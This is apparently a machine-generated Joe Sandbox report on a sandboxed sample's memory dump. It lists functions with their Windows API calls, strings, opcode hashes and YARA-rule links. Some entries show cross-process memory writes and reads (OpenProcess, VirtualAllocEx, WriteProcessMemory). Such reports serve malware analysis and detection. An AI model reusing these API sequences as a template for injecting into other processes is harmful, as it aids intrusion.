Opcode ID: acde2490e33a16346eee7ae351a57e02b2ab3d5b951215a5682de3df4f3824ef
Instruction ID: 1774ec60513aa701bd9ad8c932291319983aa07c36a0c94fa16ec1dd3d799761
Opcode Fuzzy Hash: acde2490e33a16346eee7ae351a57e02b2ab3d5b951215a5682de3df4f3824ef
Instruction Fuzzy Hash: B6416071A00209EBDF25EF54C949FEE7BB9AF44710F04402DFD06A3292DB789A45CBA1

Function 007E5745 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 007E57E0
_wcslen.LIBCMT ref: 007E57EC

Strings

CALLARGARRAY, xrefs: 007E57E6, 007E57EB

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: BuffCharUpper_wcslen
String ID: CALLARGARRAY
API String ID: 157775604-1150593374
Opcode ID: aa41a38ed0ae03d613bec4942b81018d4d4b4382cf1234097df0c68f1feef292
Instruction ID: 461534232f3477e6eebbcba40db14562e07f05f4769fc72e7dc6506f15c4dc79
Opcode Fuzzy Hash: aa41a38ed0ae03d613bec4942b81018d4d4b4382cf1234097df0c68f1feef292
Instruction Fuzzy Hash: A741B031A00149DFCB14DFA9C8859BEBBB5FF59358F104169E506A7251E7389D81CBA0

Function 007DD0F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98networkCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 007DD130
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 007DD13A

Strings

|, xrefs: 007DD10B

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: CrackInternet_wcslen
String ID: |
API String ID: 596671847-2343686810
Opcode ID: 4943ed7efaa17c33a28a2d800fda1de5c233cf5bf6b4ebacf7acddd055a871b1
Instruction ID: f2d74a71392012634148536da8f5015b69cc20d1454a833b59f4f84f34a6db33
Opcode Fuzzy Hash: 4943ed7efaa17c33a28a2d800fda1de5c233cf5bf6b4ebacf7acddd055a871b1
Instruction Fuzzy Hash: B6311271D00119EBCF15EFA4CC49AEE7FB9FF04300F104119F915A6265E736A956DB50

Function 007F356C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 007F3621
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 007F365C

Strings

static, xrefs: 007F35BC

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: 183d192e1296c0101426bd74091e89ca01ec3a5d9aee69ddfe4b9846337e1d3b
Instruction ID: e2858757dc732089ac4ce8cb850d535ce0f8550440a977feab102d4231955cf7
Opcode Fuzzy Hash: 183d192e1296c0101426bd74091e89ca01ec3a5d9aee69ddfe4b9846337e1d3b
Instruction Fuzzy Hash: A2319C71110208AEDB109F78DC80EFB73A9FF88724F009619FAA5D7290DA38ED91D760

Function 007F4537 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001132,00000000,?), ref: 007F461F
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 007F4634

Strings

', xrefs: 007F458E

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: 6a4e3cff61be1246bb0f91aaf93b0db81caa47d3729ccdce8089efb4c7a7479c
Instruction ID: 108fc747230075143195f62ae3b43443704fefca499596911b2f5962b3168d9a
Opcode Fuzzy Hash: 6a4e3cff61be1246bb0f91aaf93b0db81caa47d3729ccdce8089efb4c7a7479c
Instruction Fuzzy Hash: 32311675A002099FDF14DFA9C980BEABBB5FF49310F10406AEA05EB351D774A951CF90

Function 007C286B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 90windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000000,00000000), ref: 007C2884
SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 007C28B6

Strings

@U=u, xrefs: 007C2884, 007C28B6

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: MessageSend
String ID: @U=u
API String ID: 3850602802-2594219639
Opcode ID: 4f1f7bea4a2c02eb7097d3cd3c4979ec3aff2635ae6cf185d62b9768d00e2f6f
Instruction ID: a844adc39bdc9a192db120bdbfd5baa58a0287350d0e5318e00c6e3e3434ba2c
Opcode Fuzzy Hash: 4f1f7bea4a2c02eb7097d3cd3c4979ec3aff2635ae6cf185d62b9768d00e2f6f
Instruction Fuzzy Hash: 5621E672E00205ABCB11AF94C484EBEB7B9AF88710F00401DFD16B7291EA7CAD42C7A0

Function 007C3BC4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 80windowCOMMON

Download Yara Rule

APIs

Part of subcall function 007C3D03: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 007C3D18

SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 007C3C23
_strlen.LIBCMT ref: 007C3C2E

Strings

@U=u, xrefs: 007C3C23

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: MessageSend$Timeout_strlen
String ID: @U=u
API String ID: 2777139624-2594219639
Opcode ID: eefb4461130b0bac31a1adf458c9f2a93ac52b0d6d6fdffb2e32e42377d7b936
Instruction ID: 4ec6f85f4297b2501374115f30713fce7c19048d8ad9a42c79c49ccfd25393c1
Opcode Fuzzy Hash: eefb4461130b0bac31a1adf458c9f2a93ac52b0d6d6fdffb2e32e42377d7b936
Instruction Fuzzy Hash: A211E731704115A7CB387A78D886EBE67648F55B40F10802DF907AB2D2EE689E4287E4

Function 007F336F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 007CED19: GetLocalTime.KERNEL32 ref: 007CED2A
Part of subcall function 007CED19: _wcslen.LIBCMT ref: 007CED3B
Part of subcall function 007CED19: _wcslen.LIBCMT ref: 007CED79
Part of subcall function 007CED19: _wcslen.LIBCMT ref: 007CEDAF
Part of subcall function 007CED19: _wcslen.LIBCMT ref: 007CEDDF
Part of subcall function 007CED19: _wcslen.LIBCMT ref: 007CEDEF
Part of subcall function 007CED19: _wcslen.LIBCMT ref: 007CEE2B

SendMessageW.USER32(?,00001002,00000000,?), ref: 007F340A

Strings

SysDateTimePick32, xrefs: 007F33C7
@U=u, xrefs: 007F340A

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: _wcslen$LocalMessageSendTime
String ID: @U=u$SysDateTimePick32
API String ID: 2216836867-2530228043
Opcode ID: 194424fcb68b6a8f5a314ad4a01aa891a9036dc3f1c83f50c9efa25b426cc8e6
Instruction ID: 9b6f9d862d8004a66286c8c3008342e74ab408c3e5054978d200cebd062519d8
Opcode Fuzzy Hash: 194424fcb68b6a8f5a314ad4a01aa891a9036dc3f1c83f50c9efa25b426cc8e6
Instruction Fuzzy Hash: CE21A23134021DABEF22DE54DC85FFE33AAEB44754F104519FA51A62D0DAB9EC908760

Function 007C215F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001004,00000000,00000000), ref: 007C2178

Part of subcall function 007CB32A: GetWindowThreadProcessId.USER32(?,?), ref: 007CB355
Part of subcall function 007CB32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,007C2194,00000034,?,?,00001004,00000000,00000000), ref: 007CB365
Part of subcall function 007CB32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,007C2194,00000034,?,?,00001004,00000000,00000000), ref: 007CB37B

Part of subcall function 007CB403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,007C21D0,?,?,00000034,00000800,?,00000034), ref: 007CB42D

SendMessageW.USER32(?,00001073,00000000,?), ref: 007C21DF

Part of subcall function 007CB3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,007C21FF,?,?,00000800,?,00001073,00000000,?,?), ref: 007CB3F8

Strings

@U=u, xrefs: 007C2178, 007C21DF

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: Process$MemoryMessageSend$AllocOpenReadThreadVirtualWindowWrite
String ID: @U=u
API String ID: 1045663743-2594219639
Opcode ID: 5a713f875b1ac20770ba9c8fd5b57f16bf3cad9b62fbc33b3586182bf052fcd6
Instruction ID: 952776fbfe98bf767774cb9fe5c2bcd6b3cd64b8c208cabd00bae204cb6dee03
Opcode Fuzzy Hash: 5a713f875b1ac20770ba9c8fd5b57f16bf3cad9b62fbc33b3586182bf052fcd6
Instruction Fuzzy Hash: 5A216D31901129EBEF16EBA8DC85FEDBBB8FF08350F1041A9F549A7191EA745A44CB50

Function 007F31EF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 007F327C
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 007F3287

Strings

Combobox, xrefs: 007F3249

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: cdc19d0c9427cb37dae8603324a8291d00d558d36bbe7280d0c91e2348fe4158
Instruction ID: 42f21b25d3ea8dc7f184dd64e13b906b2edfa30423494db94e92fc2c67677435
Opcode Fuzzy Hash: cdc19d0c9427cb37dae8603324a8291d00d558d36bbe7280d0c91e2348fe4158
Instruction Fuzzy Hash: 8311907130020CAFEF219E54DC84EBB376AFB94364F104529FA1897390D6399D519760

Function 007F3710 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 0076600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0076604C
Part of subcall function 0076600E: GetStockObject.GDI32(00000011), ref: 00766060
Part of subcall function 0076600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0076606A

GetWindowRect.USER32(00000000,?), ref: 007F377A
GetSysColor.USER32(00000012), ref: 007F3794

Strings

static, xrefs: 007F3757

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: a5a70ea47c494747d7bff9a2a98fd54a89ab667b95aa7d5ff89dfd04e8a6c663
Instruction ID: 928e4ffa8faa536b23422f8bb5dc537902a93a2ca3ea7ac3c016535f1bcde7ac
Opcode Fuzzy Hash: a5a70ea47c494747d7bff9a2a98fd54a89ab667b95aa7d5ff89dfd04e8a6c663
Instruction Fuzzy Hash: 2F1117B261020DAFDB01EFA8CC45AFA7BB8EB08314F004924FA55E2250D739E851DB60

Function 007F6181 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 007F61FC
SendMessageW.USER32(?,00000194,00000000,00000000), ref: 007F6225

Strings

@U=u, xrefs: 007F61FC, 007F6225

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: MessageSend
String ID: @U=u
API String ID: 3850602802-2594219639
Opcode ID: a47f329a35aea8cae34f4985a278ec14116d328c913870273a0ccc16cfc8a363
Instruction ID: 10c9d1d93a1badae15b3e41e6003b6a30ef7f22527720cd40f2b42f73281deb4
Opcode Fuzzy Hash: a47f329a35aea8cae34f4985a278ec14116d328c913870273a0ccc16cfc8a363
Instruction Fuzzy Hash: 1B11BF7114021CBEEB119F68CD1AFBA3BA5FB0A710F004155FB16AA2E1D3B8DA00EB50

Function 007DCD1E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 007DCD7D
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 007DCDA6

Strings

<local>, xrefs: 007DCD66

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: 3d0078146d2b01f1b60146f1025fc64269bad14f631ded9ace4b5e49e89b8e55
Instruction ID: f0c9ba89ad0f5116605e87beb240e60605d5b6a771c17e3630a37957d96dccce
Opcode Fuzzy Hash: 3d0078146d2b01f1b60146f1025fc64269bad14f631ded9ace4b5e49e89b8e55
Instruction Fuzzy Hash: FC11A371305636BAD72A4A668C45EF7BE7AEF127A4F004227B15983280D6689840D6F0

Function 007F4F80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,?,?), ref: 007F4FCC

Strings

@U=u, xrefs: 007F4FCC, 007F5008

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: MessageSend
String ID: @U=u
API String ID: 3850602802-2594219639
Opcode ID: 7f1f7aa2d00549fe089744d36659060c3368a9e8995ca538bf943792526484b5
Instruction ID: 84a6f5d28971ce69fec38e668233b67f18bc24973c3deb58a1a231ecd52eccd1
Opcode Fuzzy Hash: 7f1f7aa2d00549fe089744d36659060c3368a9e8995ca538bf943792526484b5
Instruction Fuzzy Hash: 3921D37660011EEFCB15DFA8C9448EA7BB9FB4D350B004594FE06A7310D735E921DB90

Function 007F30D2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 58windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000401,?,00000000), ref: 007F3147

Strings

button, xrefs: 007F311E
@U=u, xrefs: 007F3147

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: MessageSend
String ID: @U=u$button
API String ID: 3850602802-1762282863
Opcode ID: d618fd44d562259c798e37a73acc924c7da1f44c4369dd9c0eea75ebe0f719ac
Instruction ID: 8fbbcaa63502f8e50b49dbbde2822462c833d211510f2b3a236e180bea33a19d
Opcode Fuzzy Hash: d618fd44d562259c798e37a73acc924c7da1f44c4369dd9c0eea75ebe0f719ac
Instruction Fuzzy Hash: 9611A13225020DABDF119F64DC41FFA3BAAFB48754F104514FB64A7290C77AE861A760

Function 007C6C86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 00769CB3: _wcslen.LIBCMT ref: 00769CBD

CharUpperBuffW.USER32(?,?,?), ref: 007C6CB6
_wcslen.LIBCMT ref: 007C6CC2

Strings

STOP, xrefs: 007C6CBC, 007C6CC1

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: STOP
API String ID: 1256254125-2411985666
Opcode ID: 2fed9cd2204b706c8f2e7b244f1ce1797801600af9cacf7ca07ff5579155488d
Instruction ID: 570763825cbd291d67c3eb2ec2803d9e704396d56e0a5463d54dd998e71d12c5
Opcode Fuzzy Hash: 2fed9cd2204b706c8f2e7b244f1ce1797801600af9cacf7ca07ff5579155488d
Instruction Fuzzy Hash: 830104326005278BCB20AFBDDCC4EBF73A4FB60710700052CE96393190EA39E800C660

Function 007C23DB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53windowCOMMON

Download Yara Rule

APIs

Part of subcall function 007CB403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,007C21D0,?,?,00000034,00000800,?,00000034), ref: 007CB42D

SendMessageW.USER32(?,0000102B,?,00000000), ref: 007C243B
SendMessageW.USER32(?,0000102B,?,00000000), ref: 007C245E

Strings

@U=u, xrefs: 007C243B, 007C245E

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: MessageSend$MemoryProcessWrite
String ID: @U=u
API String ID: 1195347164-2594219639
Opcode ID: 376946b1bc31d66b4fc102cceb15da55d8f9bcf3f9a7ceef4d853b46a610cdbf
Instruction ID: 9329527ce8407b0c240ef2c96b467641f4e8563c94e8113376ee4fa4e1842fc8
Opcode Fuzzy Hash: 376946b1bc31d66b4fc102cceb15da55d8f9bcf3f9a7ceef4d853b46a610cdbf
Instruction Fuzzy Hash: BD01F932900258EBEB15AF64DC4AFEEBB79DB14310F10406EF915A60D1DB786E45CB60

Function 007F4366 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000133E,00000000,?), ref: 007F43AF
InvalidateRect.USER32(?,00000000,00000001,?,?), ref: 007F4408

Strings

@U=u, xrefs: 007F43AF

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: InvalidateMessageRectSend
String ID: @U=u
API String ID: 909852535-2594219639
Opcode ID: 828c891a0dc68986d4e4bcb8020edfcbce34c4e15c49788a9877a98cc2cb9e8d
Instruction ID: 54d545d6b0aa7a87eda7845734985e0e820f9b1311a0afd54240e6622c5bd645
Opcode Fuzzy Hash: 828c891a0dc68986d4e4bcb8020edfcbce34c4e15c49788a9877a98cc2cb9e8d
Instruction Fuzzy Hash: C1116D34500748AFEB21CF28C891BF7BBE5BF05310F10851DE9AA97391D7756941DB50

Function 007C250B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000406,00000000,00000000), ref: 007C2531
SendMessageW.USER32(?,0000040D,?,00000000), ref: 007C2564

Part of subcall function 007CB3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,007C21FF,?,?,00000800,?,00001073,00000000,?,?), ref: 007CB3F8

Part of subcall function 00766B57: _wcslen.LIBCMT ref: 00766B6A

Strings

@U=u, xrefs: 007C2531, 007C2564

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
